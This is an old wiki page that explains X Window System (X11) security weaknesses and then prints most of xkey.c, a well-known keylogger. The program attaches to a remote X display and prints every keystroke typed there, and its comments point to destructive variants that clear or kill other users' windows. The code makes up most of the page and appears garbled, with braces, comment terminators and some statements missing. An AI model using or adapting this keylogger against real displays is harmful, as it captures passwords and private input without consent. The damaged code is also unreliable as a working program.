hping wiki

Eleventh version of the X Window System. The X Window System is a network transparent window system which runs on a wide range of computing and graphics machines. X11 has primitives which are useful for the creation of graphical desktops (e.g., Windows, Colors, Displays, Screens). You can almost think of X11 as a 2D graphics library but in practice it does far more than that. X11 is also responsible for delivering a unified stream of events describing the user's interaction with input devices like the keyboard, mouse, touch pads, etc.

Attackers able to access the X11 server port may be able to mount attacks, because of the complexity of this protocol. If the server is configured to provide access to connecting hosts, the protocol is totally insecure, the attacker is able to see the users's screen, log every key press and so on. The following program xkey.c (also attached to this page ad downloadable file), is an old and infamous example of this vulerabilities. It logs every keystroke of the specified host to the standard output.
/* To compile, run it through your favorite ansi compiler something like
 * this :
 *    gcc -o xkey xkey.c -lX11 -lm
 * To run it, just use it like this :  xkey displayname:0
 * and watch as that display's keypresses show up in your shell window.
 *    Dominic Giampaolo (nick@cs.maxine.wpi.edu)
#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>

char *TranslateKeyCode(XEvent *ev);

Display *d;

void snoop_all_windows(Window root, unsigned long type)
  static int level = 0;
  Window parent, *children, *child2;
  unsigned int nchildren;
  int stat, i,j,k;


  stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
  if (stat == FALSE)
     fprintf(stderr, "Can't query window tree...\n");

  if (nchildren == 0)

  /* For a more drastic inidication of the problem being exploited
   * here, you can change these calls to XSelectInput() to something
   * like XClearWindow(d, children[i]) or if you want to be real
   * nasty, do XKillWindow(d, children[i]).  Of course if you do that,
   * then you'll want to remove the loop in main().
   * The whole point of this exercise being that I shouldn't be
   * allowed to manipulate resources which do not belong to me.
  XSelectInput(d, root, type);

  for(i=0; i < nchildren; i++)
     XSelectInput(d, children[i], type);
     snoop_all_windows(children[i], type);

  XFree((char *)children);

void main(int argc, char **argv)
  char *hostname;
  char *string;
  XEvent xev;
  int count = 0;

  if (argv[1] == NULL)
    hostname = ":0";
    hostname = argv[1];

  d = XOpenDisplay(hostname);
  if (d == NULL)
     fprintf(stderr, "Blah, can't open display: %s\n", hostname);

  snoop_all_windows(DefaultRootWindow(d), KeyPressMask);

     XNextEvent(d, &xev);

     string = TranslateKeyCode(&xev);
     if (string == NULL)

     if (*string == '\r')
     else if (strlen(string) == 1)
       printf("%s", string);
       printf("<<%s>>", string);

#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];

char *TranslateKeyCode(XEvent *ev)
  int count;
  char *tmp;
  KeySym ks;

  if (ev)
     count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
     key_buff[count] = '\0';

     if (count == 0)
        tmp = XKeysymToString(ks);
        if (tmp)
          strcpy(key_buff, tmp);
          strcpy(key_buff, "");

     return key_buff;
    return NULL;

Edit this page Upload file Page history - Page last update: Tue Nov 16 10:27:16 GMT 2004 by | Your address: | Admin